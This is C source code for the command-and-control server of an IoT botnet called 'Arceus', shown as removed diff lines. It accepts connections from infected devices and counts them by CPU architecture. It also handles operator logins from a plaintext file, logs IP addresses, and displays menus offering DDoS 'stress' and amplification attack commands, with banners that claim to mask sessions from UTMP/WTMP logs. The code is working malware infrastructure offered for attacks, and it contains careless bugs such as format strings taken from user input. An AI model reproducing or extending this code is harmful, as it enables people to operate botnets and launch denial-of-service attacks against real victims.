- char *broadcast_data_psl = malloc(strlen(output_message) + 10); // Char Every Line For Output Communication
- memset(broadcast_data_psl, 0, strlen(output_message) + 10); // Fill In Data Block Usinf Memset. [Add +10, To Concurrent Connection]
- strcpy(broadcast_data_psl, output_message); // Strcpy Function Copies The String Pointed To By S2 Into The Object Pointed To By S1.
- trim_removev2(broadcast_data_psl); // Trim : [broadcast_data_psl]
- time_t systematic_time; // We Want To Display The Time
- struct tm * arc_time_info; // Create Struct. For Time
- time(&systematic_time); // Use 'Time' Module For 'systematic_time' prefix
- arc_time_info = localtime(&systematic_time); // Show Time Info Using Local Time
- char *local_time = asctime(arc_time_info); // Char Every Line For Output Communication
- trim_removev2(local_time); // Trim : [local_time]
- int trim_integer; // Output Statement Result Integers
- for(trim_integer = 0; trim_integer < max_file_descriptor_value; trim_integer++) // Set I, With max_file_descriptor_value Value
- {
- if(trim_integer == var || (!clients[trim_integer].transmitted_successfully)) continue; // Show Clients Connected To Broadcast
- if(msg_manage_val && managements[trim_integer].transmitted_successfully) // Send Management, To Show Value
- {
- send(trim_integer, "\x1b[1;35m", 9, MSG_NOSIGNAL); // Client Connected Output
- send(trim_integer, message_vector, strlen(message_vector), MSG_NOSIGNAL); // Client Connected Output
- send(trim_integer, ": ", 2, MSG_NOSIGNAL); // Client Connected Output
- }
- send(trim_integer, output_message, strlen(output_message), MSG_NOSIGNAL); // Client Connected Output
- send(trim_integer, "\n", 1, MSG_NOSIGNAL); // Client Connected Output
- }
- free(broadcast_data_psl); // Release Function From [broadcast_data_psl]
- }
- void *epollEventLoop(void *useless) // Create Struct via EPOLL, Use Void Function To Call Event
- {
- struct epoll_event event; // Create Struct via EPOLL, Use Void Function To Call Event
- struct epoll_event *events; // Create Struct via EPOLL, Use Void Function To Call Event
- int s; // Create Struct via EPOLL, Use Void Function To Call Event
- events = calloc(max_file_descriptor_value, sizeof event); // Create Struct via EPOLL, Use Void Function To Call Event
- while (1) // While == Wait 1 Second, This Is Stable
- {
- int n, trim_integer; // State 'trim_integer' And 'n'
- n = epoll_wait(bindinginterpreter, events, max_file_descriptor_value, -1); // Set 'n' With max_file_descriptor_value
- for (trim_integer = 0; trim_integer < n; trim_integer++) // 'n' && 'trim_integer' comp
- {
- if ((events[trim_integer].events & EPOLLERR) || (events[trim_integer].events & EPOLLHUP) || (!(events[trim_integer].events & EPOLLIN))) // Show Device Input Via EPOLL
- {
- clients[events[trim_integer].data.fd].transmitted_successfully = 0; // Our Devices -- More To Be Added -- Events Created Here
- clients[events[trim_integer].data.fd].arm = 0; // Our Devices -- More To Be Added -- Events Created Here
- clients[events[trim_integer].data.fd].mips = 0; // Our Devices -- More To Be Added -- Events Created Here
- clients[events[trim_integer].data.fd].x86 = 0; // Our Devices -- More To Be Added -- Events Created Here
- clients[events[trim_integer].data.fd].spc = 0; // Our Devices -- More To Be Added -- Events Created Here
- clients[events[trim_integer].data.fd].ppc = 0; // Our Devices -- More To Be Added -- Events Created Here
- clients[events[trim_integer].data.fd].sh4 = 0; // Our Devices -- More To Be Added -- Events Created Here
- close(events[trim_integer].data.fd); // Close Function
- continue; // Continue
- }
- else if (listeninginterpretation == events[trim_integer].data.fd) // Listen FD - For Events.
- {
- while (1) // While == Wait 1 Second, This Is Stable
- {
- struct sockaddr in_addr; // Create Struct For Sockaddress
- socklen_t in_len; // SOCK DEFINE
- int infd, ipIndex; // SOCK DEFINE
- in_len = sizeof in_addr; // sock define
- infd = accept(listeninginterpretation, &in_addr, &in_len); // sock define
- if (infd == -1) // sock define
- {
- if ((errno == EAGAIN) || (errno == EWOULDBLOCK)) break; // Error Validation
- else // Else
- {
- perror("arceus_listening_interpretation : acceptance error"); // accept error handling
- break; // Terminate Process
- }
- }
- clients[infd].internet_protocol = ((struct sockaddr_in *)&in_addr)->sin_addr.s_addr; // Show Clients Connected To Broadcast
- int dup = 0; // Value The DUPLICATES
- for(ipIndex = 0; ipIndex < max_file_descriptor_value; ipIndex++) { // Create Index, IP
- if(!clients[ipIndex].transmitted_successfully || ipIndex == infd) continue; // Check Connected
- if(clients[ipIndex].internet_protocol == clients[infd].internet_protocol) { // Check Connected, IP
- dup = 1; // Dup Value == 1 [Faster]
- break;
- }}
- s = socket_interpretation_block_v1(infd);
- if (s == -1) { close(infd); break; }
- event.data.fd = infd; // Create Struct via EPOLL, Use Void Function To Call Event
- event.events = EPOLLIN | EPOLLET; // Create Struct via EPOLL, Use Void Function To Call Event
- s = epoll_ctl(bindinginterpreter, EPOLL_CTL_ADD, infd, &event); // Create Struct via EPOLL, Use Void Function To Call Event
- if (s == -1) // 's' Value == -1
- {
- perror("arceus_epoll_ctl : failed"); // Epollctl Error Handling
- close(infd); // Kill infd
- break;
- }
- clients[infd].transmitted_successfully = 1; // I'm Getting Tired Of This..
- send(infd, "!* Arceus ON\n", 9, MSG_NOSIGNAL); // Send infd, Using Command Via Client.
- }
- continue; // Keep Going,...
- }
- else // What Else.. Smh...
- {
- int clear_arceus_broadcast = events[trim_integer].data.fd; // Unecessary To Comment, This Is Struct'in and Stating Integer.
- struct arceus_substrate_device_data_v4 *client = &(clients[clear_arceus_broadcast]); // Unecessary To Comment, This Is Struct'in and Stating Integer.
- int done = 0; // Unecessary To Comment, This Is Struct'in and Stating Integer.
- client->transmitted_successfully = 1; // Our Devices -- More To Be Added -- Events Created Here
- client->arm = 0; // Our Devices -- More To Be Added -- Events Created Here
- client->mips = 0; // Our Devices -- More To Be Added -- Events Created Here
- client->sh4 = 0; // Our Devices -- More To Be Added -- Events Created Here
- client->x86 = 0; // Our Devices -- More To Be Added -- Events Created Here
- client->spc = 0; // Our Devices -- More To Be Added -- Events Created Here
- client->ppc = 0; // Our Devices -- More To Be Added -- Events Created Here
- while (1) // While == Wait 1 Second, This Is Stable
- {
- ssize_t count; // State, SSize Count
- char arceus_buffer_size[2048]; // Char Buffer To [2048] - Although, This May Change As We Want A EXTREMELY Stable Client, Testing In Progress.
- memset(arceus_buffer_size, 0, sizeof arceus_buffer_size); // Fill In Data-Block, This Can Also Be Stated As The Buffer Off-set [0xA - 0xB]
- while (memset(arceus_buffer_size, 0, sizeof arceus_buffer_size) && (count = buffer_size_string_compare(arceus_buffer_size, sizeof arceus_buffer_size, clear_arceus_broadcast)) > 0) // Memset, Using The Stated Buffer-Size Value.
- {
- if (strstr(arceus_buffer_size, "\n") == NULL) { done = 1; break; } // We Shall Break The Line, Stating This As Null.
- trim_removev2(arceus_buffer_size); // Trim Buffer.
- if (strcmp(arceus_buffer_size, "SUCC") == 0) { // Ping Is The Input Connection, Waiting For It's Response. This Has To Be Allocated.
- if (send(clear_arceus_broadcast, "FUCC\n", 5, MSG_NOSIGNAL) == -1) { done = 1; break; } // FUCC, Is The Response From Ping, This is The Allocation.
- continue;
- }
- if(strstr(arceus_buffer_size, "\e[1;37m[\e[0;31mArceus\e[1;37m] Device:[\e[0;31mx86_64\e[1;37m] Loaded!") == arceus_buffer_size) // We are Loading All Of Our Devices, On The Admin Screen.
- {
- client->x86 = 1; // We are Loading All Of Our Devices, On The Admin Screen.
- }
- if(strstr(arceus_buffer_size, "\e[1;37m[\e[0;31mArceus\e[1;37m] Device:[\e[0;31mx86_32\e[1;37m] Loaded!") == arceus_buffer_size) // We are Loading All Of Our Devices, On The Admin Screen.
- {
- client->x86 = 1; // We are Loading All Of Our Devices, On The Admin Screen.
- }
- if(strstr(arceus_buffer_size, "\e[1;37m[\e[0;31mArceus\e[1;37m] Device:[\e[0;31mMIPS\e[1;37m] Loaded!") == arceus_buffer_size) // We are Loading All Of Our Devices, On The Admin Screen.
- {
- client->mips = 1; // We are Loading All Of Our Devices, On The Admin Screen.
- }
- if(strstr(arceus_buffer_size, "\e[1;37m[\e[0;31mArceus\e[1;37m] Device:[\e[0;31mMPSL\e[1;37m] Loaded!") == arceus_buffer_size) // We are Loading All Of Our Devices, On The Admin Screen.
- {
- client->mips = 1; // We are Loading All Of Our Devices, On The Admin Screen.
- }
- if(strstr(arceus_buffer_size, "\e[1;37m[\e[0;31mArceus\e[1;37m] Device:[\e[0;31mARM4\e[1;37m] Loaded!") == arceus_buffer_size) // We are Loading All Of Our Devices, On The Admin Screen.
- {
- client->arm = 1; // We are Loading All Of Our Devices, On The Admin Screen.
- }
- if(strstr(arceus_buffer_size, "\e[1;37m[\e[0;31mArceus\e[1;37m] Device:[\e[0;31mARM5\e[1;37m] Loaded!") == arceus_buffer_size) // We are Loading All Of Our Devices, On The Admin Screen.
- {
- client->arm = 1; // We are Loading All Of Our Devices, On The Admin Screen.
- }
- if(strstr(arceus_buffer_size, "\e[1;37m[\e[0;31mArceus\e[1;37m] Device:[\e[0;31mARM6\e[1;37m] Loaded!") == arceus_buffer_size) // We are Loading All Of Our Devices, On The Admin Screen.
- {
- client->arm = 1; // We are Loading All Of Our Devices, On The Admin Screen.
- }
- if(strstr(arceus_buffer_size, "\e[1;37m[\e[0;31mArceus\e[1;37m] Device:[\e[0;31mARM7\e[1;37m] Loaded!") == arceus_buffer_size) // We are Loading All Of Our Devices, On The Admin Screen.
- {
- client->arm = 1; // We are Loading All Of Our Devices, On The Admin Screen.
- }
- if(strstr(arceus_buffer_size, "\e[1;37m[\e[0;31mArceus\e[1;37m] Device:[\e[0;31mPPC\e[1;37m] Loaded!") == arceus_buffer_size) // We are Loading All Of Our Devices, On The Admin Screen.
- {
- client->ppc = 1; // We are Loading All Of Our Devices, On The Admin Screen.
- }
- if(strstr(arceus_buffer_size, "\e[1;37m[\e[0;31mArceus\e[1;37m] Device:[\e[0;31mSPC\e[1;37m] Loaded!") == arceus_buffer_size) // We are Loading All Of Our Devices, On The Admin Screen.
- {
- client->spc = 1; // We are Loading All Of Our Devices, On The Admin Screen.
- }
- if(strcmp(arceus_buffer_size, "SUCC") == 0) { // Input Connection, Response Is Below
- if(send(clear_arceus_broadcast, "FUCC\n", 5, MSG_NOSIGNAL) == -1) { done = 1; break; } // Response Line, SUCC/FUCC Uses Strcmp
- continue; }
- if(strcmp(arceus_buffer_size, "FUCC") == 0) { // We use 'strcmp' To Compare Both Of Our Input And Output - [Response] Strings
- continue; } // This Is Then Used, To Output A Valid Integer
- printf("\"%s\"\n", arceus_buffer_size); } // This Is The Output Here
- if (count == -1) // Error Value - [Show ERR]
- {
- if (errno != EAGAIN) // // Error Value - [Show ERR]
- {
- done = 1; // Error Value
- }
- break;
- }
- else if (count == 0) // // Error Value - [Show ERR]
- {
- done = 1; // // Error Value - [Show ERR]
- break; // Break This Function. Terminate.
- }
- }
- if (done) // Only If Value, Is [Done] ( Equal To 0 )
- {
- client->transmitted_successfully = 0; // Display Our Devices, This Is One The Client Side.
- client->arm = 0; // Display Our Devices, This Is One The Client Side.
- client->mips = 0; // Display Our Devices, This Is One The Client Side.
- client->sh4 = 0; // Display Our Devices, This Is One The Client Side.
- client->x86 = 0; // Display Our Devices, This Is One The Client Side.
- client->spc = 0; // Display Our Devices, This Is One The Client Side.
- client->ppc = 0; // Display Our Devices, This Is One The Client Side.
- close(clear_arceus_broadcast);
- }
- }
- }
- }
- }
- unsigned int arceus_arm_connected() // Create An Unsigned Integer, For Our Device
- {
- int trim_integer = 0, total_output = 0; // Stating First Integer [int == 0,] - The Total, Will ALso Be NULL [ 0 ]
- for(trim_integer = 0; trim_integer < max_file_descriptor_value; trim_integer++) // We Shall Set The File Descriptor Maximum For I.
- {
- if(!clients[trim_integer].arm) continue; // Continue, After Device Statement.
- total_output++; // Total Device Value
- }
- return total_output; // Return Statement Terminates The Execution Of a Function And Returns Control To The Calling Function
- }
- unsigned int arceus_mipsel_connected() // Create An Unsigned Integer, For Our Device
- {
- int trim_integer = 0, total_output = 0; // Stating First Integer [int == 0,] - The Total, Will ALso Be NULL [ 0 ]
- for(trim_integer = 0; trim_integer < max_file_descriptor_value; trim_integer++) // We Shall Set The File Descriptor Maximum For I.
- {
- if(!clients[trim_integer].mips) continue; // Continue, After Device Statement.
- total_output++; // Total Device Value
- }
- return total_output; // Return Statement Terminates The Execution Of a Function And Returns Control To The Calling Function
- }
- unsigned int arceus_x86_connected() // Create An Unsigned Integer, For Our Device
- {
- int trim_integer = 0, total_output = 0; // Stating First Integer [int == 0,] - The Total, Will ALso Be NULL [ 0 ]
- for(trim_integer = 0; trim_integer < max_file_descriptor_value; trim_integer++) // We Shall Set The File Descriptor Maximum For I.
- {
- if(!clients[trim_integer].x86) continue; // Continue, After Device Statement.
- total_output++; // Total Device Value
- }
- return total_output; // Return Statement Terminates The Execution Of a Function And Returns Control To The Calling Function
- }
- unsigned int arceus_spc_connected() // Create An Unsigned Integer, For Our Device
- {
- int trim_integer = 0, total_output = 0; // Stating First Integer [int == 0,] - The Total, Will ALso Be NULL [ 0 ]
- for(trim_integer = 0; trim_integer < max_file_descriptor_value; trim_integer++) // We Shall Set The File Descriptor Maximum For I.
- {
- if(!clients[trim_integer].spc) continue; // Continue, After Device Statement.
- total_output++; // Total Device Value
- }
- return total_output; // Return Statement Terminates The Execution Of a Function And Returns Control To The Calling Function
- }
- unsigned int arceus_ppc_connected() // Create An Unsigned Integer, For Our Device
- {
- int trim_integer = 0, total_output = 0; // Stating First Integer [int == 0,] - The Total, Will ALso Be NULL [ 0 ]
- for(trim_integer = 0; trim_integer < max_file_descriptor_value; trim_integer++) // We Shall Set The File Descriptor Maximum For I.
- {
- if(!clients[trim_integer].ppc) continue; // Continue, After Device Statement.
- total_output++; // Total Device Value
- }
- return total_output; // Return Statement Terminates The Execution Of a Function And Returns Control To The Calling Function
- }
- unsigned int arceus_sh4_connected() // Create An Unsigned Integer, For Our Device
- {
- int trim_integer = 0, total_output = 0; // Stating First Integer [int == 0,] - The Total, Will ALso Be NULL [ 0 ]
- for(trim_integer = 0; trim_integer < max_file_descriptor_value; trim_integer++) // We Shall Set The File Descriptor Maximum For I.
- {
- if(!clients[trim_integer].sh4) continue; // Continue, After Device Statement.
- total_output++; // Total Device Value
- }
- return total_output; // Return Statement Terminates The Execution Of a Function And Returns Control To The Calling Function
- }
- unsigned int arceus_clients_connected() // Create An Unsigned Integer, For Our Device
- {
- int trim_integer = 0, total_output = 0; // Stating First Integer [int == 0,] - The Total, Will ALso Be NULL [ 0 ]
- for (trim_integer = 0; trim_integer < max_file_descriptor_value; trim_integer++) // We Shall Set The File Descriptor Maximum For I.
- {
- if (!clients[trim_integer].transmitted_successfully) continue; // Continue, After Device Statement.
- total_output++; // Total Device Value
- }
- return total_output; // Return Statement Terminates The Execution Of a Function And Returns Control To The Calling Function
- }
- void *arceus_title_creator(void *sock) // We Shall Create A Window Title For The Screen
- {
- int clear_arceus_broadcast = (long int)sock; // Creating A 'Long' Integer, For socket_propulsion_data output
- char string[2048]; // Char Every Line For Output Communication
- while(1) // While == Wait 1 Second, This Is Stable
- {
- memset(string, 0, 2048);
- sprintf(string, "%c]0; Arceus I [BETA] | IoT Devices: %d | Administrators: %d %c", '\033', arceus_clients_connected(), successful_transmission, '\007'); // [Title]
- if(send(clear_arceus_broadcast, string, strlen(string), MSG_NOSIGNAL) == -1); // Send Output Response
- sleep(2); // Sleep, So No Concurrent Processes Create Any Problems
- }
- }
- int arceus_file_searcher_v3(char *target_string) // Char Every Line For Output Communication [Search In File]
- {
- FILE *fp; // FILE*fp - File Pointer
- int line_numerical = 0; // Create Integer For Each Line Number
- int result_found_data = 0, find_line = 0; // Create Integer For Each Line Number
- char temp[512]; // Char [512]
- if ((fp = fopen("arceus.txt", "r")) == NULL) { // [Login.txt Output]
- return(-1); // Return Value
- }
- while (fgets(temp, 512, fp) != NULL) { // temp -- 512
- if ((strstr(temp, target_string)) != NULL) { // Constant Char Communication Between Unsigned_Integer.
- result_found_data++; // Finding Output Value
- find_line = line_numerical; // Find Line, Then Put Under Line_Numerical
- }
- line_numerical++; // Line Output -- Line Total
- }
- if (fp) // Check
- fclose(fp); // Kill
- if (result_found_data == 0)return 0; // Result Output
- return find_line;
- }
- void arceus_client_address(struct sockaddr_in addr) { // Client Adress -- To Socket Adress
- printf("\e[91mIP\e[91m:[\e[91m%d.%d.%d.%d\e[91m]\n", // Display User IP Output
- addr.sin_addr.s_addr & 0xFF, // 0xFF --> + Whatever Stated Value
- (addr.sin_addr.s_addr & 0xFF00) >> 8, // 0xFF --> + Whatever Stated Value
- (addr.sin_addr.s_addr & 0xFF0000) >> 16, // 0xFF --> + Whatever Stated Value
- (addr.sin_addr.s_addr & 0xFF000000) >> 24); // 0xFF --> + Whatever Stated Value
- FILE *arceus_log_file; // Create IP Log
- arceus_log_file = fopen("logs/Arceus_IP.log", "a"); // Output The File
- fprintf(arceus_log_file, "\n\e[91mIP\e[91m:[\e[91m%d.%d.%d.%d\e[91m]", // IP Format, Via The Following.
- addr.sin_addr.s_addr & 0xFF, // 0xFF --> Whatever Stated Value
- (addr.sin_addr.s_addr & 0xFF00) >> 8, // 0xFF --> Whatever Stated Value
- (addr.sin_addr.s_addr & 0xFF0000) >> 16, // 0xFF --> Whatever Stated Value
- (addr.sin_addr.s_addr & 0xFF000000) >> 24); // 0xFF --> Whatever Stated Value
- fclose(arceus_log_file); // Close The Log File
- }
- // struct msghdr {
- // void *msg_name; /* optional address */
- // socklen_t msg_namelen; /* size of address */
- // struct iovec *msg_iov; /* scatter/gather array */
- // size_t msg_iovlen; /* # elements in msg_iov */
- // void *msg_control; /* ancillary data, see below */
- // size_t msg_controllen; /* ancillary data buffer len */
- // int msg_flags; /* flags on received message */
- //
- void *arceus_telnet_data(void *sock) { // Here Is Where The Magic Happens
- int clear_arceus_broadcast = (int)sock; // Create Integer For socket_propulsion_data
- successful_transmission++; // State Manages Connected
- int find_line; // Create Integer For Find Line Function
- pthread_t title; // Use pthread To Output Title
- char counter[2048]; // Char Every Line For Output Communication
- memset(counter, 0, 2048); // Fill Data Block - [2048]
- char arceus_buffer_size[2048]; // Char Every Line For Output Communication
- char* write_string; // Char Every Line For Output Communication
- char usernamez[80]; // Char Every Line For Output Communication
- char* password; // Char Every Line For Output Communication
- char *Admin = "Admin"; // Char Every Line For Output Communication
- char *Normal = "Normal"; // Char Every Line For Output Communication
- char *Vip = "Vip"; // Char Every Line For Output Communication
- char *Owner = "Owner"; // Char Every Line For Output Communication
- memset(arceus_buffer_size, 0, sizeof arceus_buffer_size); // Fill Data Block - [arceus_buffer_size]
- char arceus[2048]; // Char Every Line For Output Communication
- memset(arceus, 0, 2048); // Fill Data Block - [2048]
- FILE *fp; // Check
- int trim_integer = 0; // Create Integer For I
- int c; // Create Integer For C
- fp = fopen("arceus.txt", "r"); // format: username pass identification_type (identification_type is only need if Admin username ex: username pass Admin)
- while (!feof(fp)) // feof
- {
- c = fgetc(fp); // Define C to fget
- ++trim_integer; // Total Value Size
- }
- int succ = 0; // Create Integer J
- rewind(fp); // Rewind [fp]
- while (succ != trim_integer - 1) // Call Integer J
- {
- fscanf(fp, "%s %s %s", accounts[succ].username, accounts[succ].password, accounts[succ].identification_type); // Displaying, User -- Pass, Through Specific Format
- ++succ;
- }
- char Prompt_1 [500]; // Char Every Line For Output Communication
- sprintf(Prompt_1, " \e[91m╔═════════════════════════════╗\r\n \e[91m║ \e[91mWelcome To Arceus I \e[91m║\r\n \e[91m║ \e[91mPlease Enter your Username \e[91m║\r\n \e[91m║ \e[91mIn the Login Prompt Below \e[91m║\r\n \e[91m╚═════════════════════════════╝ \r\n \e[91m╔═════════════════════════════════════╗\r\n \e[91m║ \e[91mThis Source Code is \e[91m║\r\n \e[91m║ \e[91m Licensed under GPU V3.0 \e[91m║\r\n \e[91m║ \e[91mFOR ALLOWED USE IN 'CYBER-WARFARE' \e[91m║\r\n \e[91m╚═════════════════════════════════════╝\r\n");
- if(send(clear_arceus_broadcast, "\033[1A\033[2J\033[1;1H", 14, MSG_NOSIGNAL) == -1) goto finish_integer; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- if(send(clear_arceus_broadcast, Prompt_1, strlen(Prompt_1), MSG_NOSIGNAL) == -1) goto finish_integer; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- sprintf(arceus, "\e[91mUsername:\e[91m "); // Username Input
- if (send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) goto finish_integer; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- if (buffer_size_string_compare(arceus_buffer_size, sizeof arceus_buffer_size, clear_arceus_broadcast) < 1) goto finish_integer; // Restate Buffer Size, If Output Is Released
- trim_removev2(arceus_buffer_size); // Trim [Buffer]
- sprintf(usernamez, arceus_buffer_size); // Use Data From 'Usernamez'
- write_string = ("%s", arceus_buffer_size); // Find String Input From User
- find_line = arceus_file_searcher_v3(write_string); // We Search The User File
- if (strcmp(write_string, accounts[find_line].username) == 0) { // Here Is Our Login System
- sprintf(arceus, "\e[91mLogging In As User: \e[91m%s\r\n", accounts[find_line].username, arceus_buffer_size); // Find User, Via The Login File, This Is Dependent On User Input
- sprintf(arceus, "\e[91mPlease Enter Your Password!\r\n"); // Enter Password Display Output - This Is User Input
- sprintf(arceus, "\e[91mPassword: \e[91m"); // Enter Password - This Is User Input
- if (send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) goto finish_integer; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- if (buffer_size_string_compare(arceus_buffer_size, sizeof arceus_buffer_size, clear_arceus_broadcast) < 1) goto finish_integer; // Restate Buffer Size, If Output Is Released
- trim_removev2(arceus_buffer_size); // Trim [Buffer]
- if (strcmp(arceus_buffer_size, accounts[find_line].password) != 0) goto failed; // If No User, Is Found, Continue To 'Failed' Output
- memset(arceus_buffer_size, 0, 2048); // Memset Data Block Fill, Just So We Are Stable
- goto Arceus; // Go To 'Arceus'
- }
- failed:
- pthread_create(&title, NULL, &arceus_title_creator, sock);
- char failed_line1[5000]; // Char Every Line For Output Communication
- char failed_line2[5000]; // Char Every Line For Output Communication
- char clearscreen [5000]; // Char Every Line For Output Communication
- memset(clearscreen, 0, 2048); // Memset Data Block Fill, Just So We Are Stable
- sprintf(clearscreen, "\033[2J\033[1;1H"); // Clear Screen
- sprintf(failed_line1, "Login Error!\r\n"); // We are Attempting To Display FailedBanner!
- sprintf(failed_line2, "If you run into this issue please contact the owner!\r\n"); // We are Attempting To Display FailedBanner!
- sleep(1); // You Have Failed!
- if(send(clear_arceus_broadcast, clearscreen, strlen(clearscreen), MSG_NOSIGNAL) == -1) goto finish_integer; // You Have Failed!
- if(send(clear_arceus_broadcast, failed_line1, strlen(failed_line1), MSG_NOSIGNAL) == -1) goto finish_integer; // You Have Failed!
- if(send(clear_arceus_broadcast, failed_line2, strlen(failed_line2), MSG_NOSIGNAL) == -1) goto finish_integer; // You Have Failed!
- sleep(3); // Sleep For 3 Seconds, Clean Exit
- goto finish_integer; // You Have Failed!
- if (send(clear_arceus_broadcast, "\033[1A", 5, MSG_NOSIGNAL) == -1) goto finish_integer;
- Arceus: // We are Displaying Attempting to display main banner!
- pthread_create(&title, NULL, &arceus_title_creator, sock); // We are Displaying Attempting to display main banner!
- if (send(clear_arceus_broadcast, "\033[1A\033[2J\033[1;1H", 14, MSG_NOSIGNAL) == -1) goto finish_integer; // We are Displaying Attempting to display main banner!
- if(send(clear_arceus_broadcast, "\r\n", 2, MSG_NOSIGNAL) == -1) goto finish_integer; // We are Displaying Attempting to display main banner!
- char start_1 [90000]; // Char Every Line For Output Communication
- char start_2 [90000]; // Char Every Line For Output Communication
- char start_3 [90000]; // Char Every Line For Output Communication
- char start_4 [90000]; // Char Every Line For Output Communication
- char start_7 [90000]; // Char Every Line For Output Communication
- char start_8 [90000]; // Char Every Line For Output Communication
- char start_9 [90000]; // Char Every Line For Output Communication
- char start_10 [90000]; // Char Every Line For Output Communication
- char start_12 [90000]; // Char Every Line For Output Communication
- char start_13 [90000]; // Char Every Line For Output Communication
- char Arceus_1 [90000]; // Char Every Line For Output Communication
- // clear
- sprintf(start_1, "\e[91m[\e[91mArceus\e[91m] \e[90m| \e[91mAllocating Substrate Data Array Using VSL_SH\r\n"); // Successful Connection, We Are Loading Into Arceus...
- sprintf(start_2, "\e[91m[\e[91mArceus\e[91m] \e[90m| \e[91mSubstrate IV - Detected \e[38;5;82mSuccessfully!\r\n"); // Successful Connection, We Are Loading Into Arceus...
- // clear
- sprintf(start_3, "\e[91m[\e[91mArceus\e[91m] \e[90m| \e[91mMasking Socket_Exchange From \e[38;5;82mUTMP+WTMP\r\n"); // Successful Connection, We Are Loading Into Arceus...
- sprintf(start_4, "\e[91m[\e[91mArceus\e[91m] \e[90m| \e[38;5;82mSucessfully \e[91mMasked Inbound Socket_Exchange Connection \r\n"); // Successful Connection, We Are Loading Into Arceus...
- // clear
- sprintf(start_7, "\e[91m[\e[91mArceus\e[91m] \e[90m| \e[91mLogging User Information..\r\n"); // Successful Connection, We Are Loading Into Arceus...
- sprintf(start_8, "\e[91m[\e[91mArceus\e[91m] \e[90m| \e[91mUser Information Successfully Logged!\r\n"); // Successful Connection, We Are Loading Into Arceus...
- // clear
- sprintf(start_9, "\e[91m[\e[91mArceus\e[91m] \e[90m| \e[91mWelcome \e[91m[\e[91m%s\e[91m]\r\n", accounts[find_line].username, arceus_buffer_size); // Successful Connection, We Are Loading Into Arceus...
- sprintf(start_10, "\e[91m[\e[91mArceus\e[91m] \e[90m| \e[91mYour Access Level Is \e[38;5;82m%s!\r\n", accounts[find_line].identification_type, arceus_buffer_size); // Successful Connection, We Are Loading Into Arceus...
- sprintf(start_12, "\e[91m[\e[91mArceus\e[91m] \e[90m| \e[91mLoading Arceus C2 Session.. \r\n"); // Successful Connection, We Are Loading Into Arceus...
- sprintf(start_13, "\e[91m[\e[91mArceus\e[91m] \e[90m| \e[91mArceus C2 Session \e[38;5;82mLoaded! \r\n"); // Successful Connection, We Are Loading Into Arceus...
- //clear
- sprintf(Arceus_1, "\e[91m╔════════════════════════════════════╗ ╔════════════════════════╗\r\n\e[91m║ \e[91mArceus I \e[91m-\e[91m Main Menu \e[91m- \e[91mWelcome! \e[91m║ ╔══════╣ \e[91mSuggested Port\e[91m: \e[38;5;82m62627 \e[91m║\r\n\e[91m╠════════════════════════════════════╣ ║ ║ \e[91mSuggested Psize\e[91m: \e[38;5;82m1460 \e[91m║\r\n\e[91m║ \e[91m Welcome to Project Arceus I \e[91m╠═══╗ ║ ║ \e[91mSuggested Method\e[91m: \e[38;5;82mSTD \e[91m║\r\n\e[91m║ \e[91m This source is currently in beta \e[91m║ ║ ╔═╩══╗ ║ \e[91mMax Attack time\e[91m: \e[38;5;82m300 \e[91m║\r\n\e[91m╚═══════════════╦════════════════════╝ ╚═══╣ \e[91m<3 \e[91m╠═╗ ╚════════════════════════╝\r\n\e[91m ║ \e[91mFlexingOnLamers \e[91mx \e[91mJack\e[91m ╚════╝ ║\r\n\e[91m ║ \e[91mTransmissional \e[91mx \e[91mZach\e[91m ║\r\n\e[91m╔═══════════════╩══════════════════╗ \e[91m ║\r\n\e[91m║ \e[91mArceus I \e[91m- \e[91mCommand List \e[91m-\e[91m CMDs \e[91m║ ╔══════════════╩══════════════════════════╗\r\n\e[91m╠══════════════════════════════════╣ ║ \e[91mOS_System\e[91m:\e[91m CentOS \e[91m[\e[91m6\e[91m] - [\e[91m7\e[91m] \e[91m║\r\n\e[91m║ \e[91m.help \e[91m- \e[91mFull List of Commands \e[91m║ ║ \e[91mCCR: XXX-223-389 \e[91m║\r\n\e[91m║ \e[91m.stress \e[91m-\e[91m List of DDoS Commands \e[91m╠═╣ \e[91mCIPHER\e[91m: \e[91mSHA-512 \e[91m, \e[91mAES-BYTE \e[91m, \e[91mCIPHER-TLS \e[91m║\r\n\e[91m║ \e[91m.logout\e[91m -\e[91m Logs out of the C2 \e[91m║ ║ \e[91mSTATE\e[91m: \e[91mPRIVATE \e[91m║\r\n\e[91m║ \e[91m.clear \e[91m- \e[91mClears screen \e[91m║ ║ \e[91mOBJ-TYPE\e[91m: \e[91mC2 SOURCE X TELNET LAYER \e[91m║\r\n\e[91m║ \e[91m.tools \e[91m-\e[91m List of available tools \e[91m║ ║ \e[91mLSC\e[91m: \e[91mGL3.0 \e[91m║\r\n\e[91m║ \e[91m.iphm \e[91m-\e[91m AMP Attack Methods \e[91m║ ║ \e[91mPRJ-VAS\e[91m: \e[91m6949-3853-9891 \e[91m║\r\n\e[91m║ \e[91m.ipmi \e[91m- \e[91mAMP Attack Methods v2 \e[91m║ ║ \e[91mDESC\e[91m: \e[91mNET-WSS \e[91m║\r\n\e[91m║ \e[91m.vip \e[91m-\e[91m VIP Command List \e[91m║ ║ \e[91mVERSION\e[91m: \e[91mARCEUS_I_BETA_VERSION_X \e[91m║\r\n\e[91m║ \e[91m.staff\e[91m - \e[91mAdmin Command List \e[91m║ ║ \e[91mSUBSTRATE\e[91m: \e[91mVERSION IV \e[91m║\r\n\e[91m║ \e[91m.bots \e[91m- \e[91mDisplays Devices Online \e[91m║ ║ \e[91mSCKET_INTERPRET\e[91m: \e[91mINSTANCE_II \e[91m║\r\n\e[91m╚══════════════════════════════════╝ ╚═════════════════════════════════════════╝\r\n");
- if (send(clear_arceus_broadcast, "\033[1A\033[2J\033[1;1H", 14, MSG_NOSIGNAL) == -1) goto finish_integer; // We are Displaying Attempting to display main banner!
- if(send(clear_arceus_broadcast, start_1, strlen(start_1), MSG_NOSIGNAL) == -1) goto finish_integer; // Clear Screen From Broadcast -- We Are Stable !
- sleep (2);
- if(send(clear_arceus_broadcast, start_2, strlen(start_2), MSG_NOSIGNAL) == -1) goto finish_integer; // Clear Screen From Broadcast -- We Are Stable !
- sleep (2);
- if (send(clear_arceus_broadcast, "\033[1A\033[2J\033[1;1H", 14, MSG_NOSIGNAL) == -1) goto finish_integer; // Clear Screen From Broadcast -- We Are Stable !
